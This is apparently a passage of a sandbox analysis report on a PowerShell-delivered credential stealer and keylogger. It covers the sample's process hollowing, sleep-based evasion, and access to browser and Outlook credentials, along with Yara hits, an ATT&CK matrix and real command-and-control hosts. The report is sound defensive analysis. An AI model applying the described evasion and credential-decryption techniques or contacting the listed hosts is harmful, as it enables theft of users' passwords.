                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dll
                      The file is never launched because it is a helper DLL, not a stage: its name, together with the self-injection rows under HIPS / PFW / Operating System Protection Evasion (x.exe spawning x.exe and writing an MZ header at base 400000), fits a RunPE-style loader that x.exe loads in-process.
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 800  Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3596  Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6060  Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 5216  Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016  Thread sleep time: -29514790517935264s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7016  Thread sleep time, 53 consecutive calls, each >= -30000s: -100000s, -99891s, -99782s, -99657s, -99532s, -99422s, -99313s, -99188s, -99063s, -98938s, -98813s, -98703s, -98594s, -98469s, -98360s, -98235s, -98110s, -97985s, -97860s, -97735s, -97610s, -97485s, -97360s, -97235s, -97110s, -96985s, -96860s, -96645s, -96485s, -96323s, -96219s, -96016s, -95891s, -95782s, -95657s, -95532s, -95407s, -95297s, -95188s, -95063s, -94938s, -94813s, -94688s, -94578s, -94469s, -94344s, -94235s, -94110s, -93985s, -93718s, -93563s, -93375s, -93250s
                      Source: C:\Windows\System32\svchost.exe TID: 6252  Thread sleep time: -30000s >= -30000s (2 events)
                      Source: C:\Windows\System32\svchost.exe  File opened: PhysicalDrive0
                      Units: despite the "s" suffix these values are milliseconds (the -30000 threshold is the sandbox's 30-second rule, and 922337203685477 is the Sleep(INFINITE) encoding 2^63 / 10000 in ms; -1844674407370954 and -29514790517935264 are exact multiples of it and are likewise indefinite waits). The 53 TID 7016 calls sum to 5,127,866 ms, about 85 minutes, which is what triggers "Contains long sleeps (>= 3 min)". Each call is 109-125 ms shorter than the previous one (occasionally up to about 270 ms), which is consistent with a loop that re-sleeps for the time remaining until a deadline after each call returns early; that reading is an interpretation, not something the report states.
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Thread delayed: delay time: 922337203685477 (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Thread delayed: delay time: 922337203685477 (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Thread delayed, 53 events (the same TID 7016 intervals as the Thread sleep time rows above, reported a second time by the Thread delayed signature): delay time: 100000, 99891, 99782, 99657, 99532, 99422, 99313, 99188, 99063, 98938, 98813, 98703, 98594, 98469, 98360, 98235, 98110, 97985, 97860, 97735, 97610, 97485, 97360, 97235, 97110, 96985, 96860, 96645, 96485, 96323, 96219, 96016, 95891, 95782, 95657, 95532, 95407, 95297, 95188, 95063, 94938, 94813, 94688, 94578, 94469, 94344, 94235, 94110, 93985, 93718, 93563, 93375, 93250
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: x.exe, 00000004.00000002.1131825044.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
                      Source: svchost.exe, 00000006.00000002.2827493932.0000021EB5E53000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2825804218.0000021EB082B000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
                      Source: x.exe, 00000005.00000002.3552935335.0000000000E78000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: svchost.exe, 00000006.00000002.2825843302.0000021EB0840000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWD
                      "Hyper-V RAW" is the Winsock catalog name of the AF_HYPERV socket provider that mswsock.dll registers on every Windows 10 host. The string is in these processes' memory because they use Winsock, not because the sample looks for a hypervisor; do not count it as VM detection.
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Process token adjusted: Debug (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Memory allocated: page read and write | page guard
                      "Process token adjusted: Debug" is AdjustTokenPrivileges enabling SeDebugPrivilege, the basis of the "Enables debug privileges" signature; it is what lets x.exe open and write the second x.exe process during the injection recorded under HIPS / PFW / Operating System Protection Evasion.

                      HIPS / PFW / Operating System Protection Evasion

                      Source: 4.2.x.exe.4329590.3.raw.unpack, UltraSpeed.cs  Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                      Source: 4.2.x.exe.4329590.3.raw.unpack, FFDecryptor.cs  Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                      Source: 4.2.x.exe.4329590.3.raw.unpack, FFDecryptor.cs  Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Memory written: C:\Users\user\AppData\Local\Temp\x.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                      The three source references come from the unpacked stealer itself: MapVirtualKey in UltraSpeed.cs translates virtual-key codes for the keystroke logger, and FFDecryptor.cs loading mozglue.dll from the Firefox directory and resolving exports through GetProcAddress is the standard way of decrypting Firefox saved logins with Mozilla's own NSS libraries. The last three rows are self-hollowing (RunPE): x.exe, process 4, which holds the unpacked payload at 4329590, starts a second copy of its own image and writes a fresh PE, MZ header first, at that copy's image base 400000. The Yara hit on 5.2.x.exe.400000.0.unpack under Stealing of Sensitive Information is that payload running in the hollowed child, process 5.
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program ManagerLR
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager
                      Source: x.exe, 00000005.00000002.3555469132.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program ManagerXg*
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D50000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program ManagerlB
                      Source: x.exe, 00000005.00000002.3555469132.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: Program Manager@\
                      "Program Manager" is the window title of the desktop (Progman). It sits in the hollowed process's heap (all five hits are in process 5) because the keylogger records the foreground window title alongside captured keystrokes, which is also what the foregroundWindowGot count above reflects; the trailing characters are adjacent heap bytes, not part of the string.
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation (4 events)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (4 events)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\System32\notepad.exe  Queries volume information: C:\Users\user\Desktop\DON.ps1 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\x.exe VolumeInformation (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation (2 events)
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Users\user\AppData\Local\Temp\RUNPEE.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\x.exe  Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation (6 events)
                      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation (4 events)
                      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation (3 events)
                      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exe  Queries volume information: C:\ VolumeInformation (2 events)
                      These volume queries are the .NET binder probing assemblies as they are loaded. The set x.exe binds (System.Windows.Forms, System.Drawing, System.Web.Extensions, System.Security, Microsoft.VisualBasic) is what a stealer that captures the screen and clipboard, hooks keystrokes and handles JSON credential stores needs, and the RUNPEE.dll query shows the dropped DLL being bound in-process even though it is never started as its own process. The svchost.exe rows touch the BITS job database (qmgr.db, edb.*) and belong to the BITS service host; attribute them to the sample only if the process tree shows it creating a BITS job.
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 4.2.x.exe.2b89bb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b89bb4.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b85378.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b85378.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1133468244.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\x.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 4.2.x.exe.2b89bb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b89bb4.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b85378.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.2b85378.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1133468244.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Source: Yara match | File source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      ATT&CK matrix (one column per tactic; cells prefixed with a number are the techniques the report flagged, the number being the count shown on the page):

                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 11 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 112 Process Injection | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 23 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 1 Query Registry | SMB/Windows Admin Shares | 1 Screen Capture | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Software Packing | NTDS | 111 Security Software Discovery | Distributed Component Object Model | 1 Email Collection | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 2 Process Discovery | SSH | 1 Input Capture | 33 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | 1 Clipboard Data | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 112 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      Behavior Graph ID: 1638293 | Sample: DON.ps1 | Start date: 14/03/2025 | Architecture: WINDOWS | Score: 100
                      Start: contacts reallyfreegeoip.org, mail.tsengg.com and 2 other IPs or domains; signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 9 other signatures; starts powershell.exe, svchost.exe, notepad.exe
                      reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
                      powershell.exe: drops C:\Users\user\AppData\Local\Temp\x.exe (PE32); signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file; starts x.exe, conhost.exe
                      svchost.exe: 127.0.0.1 unknown unknown
                      x.exe: 176.65.144.3, 49707, 80 PALTEL-ASPALTELAutonomousSystemPS Germany; drops C:\Users\user\AppData\Local\Temp\RUNPEE.dll (PE32); signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects a PE file into a foreign processes; starts a second x.exe
                      x.exe (second instance): mail.tsengg.com 103.21.58.29, 49710, 49720, 49722 PUBLIC-DOMAIN-REGISTRYUS United Arab Emirates; checkip.dyndns.com 132.226.247.73, 49708, 49719, 49721 UTMEMUS United States; 3 other IPs or domains; signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.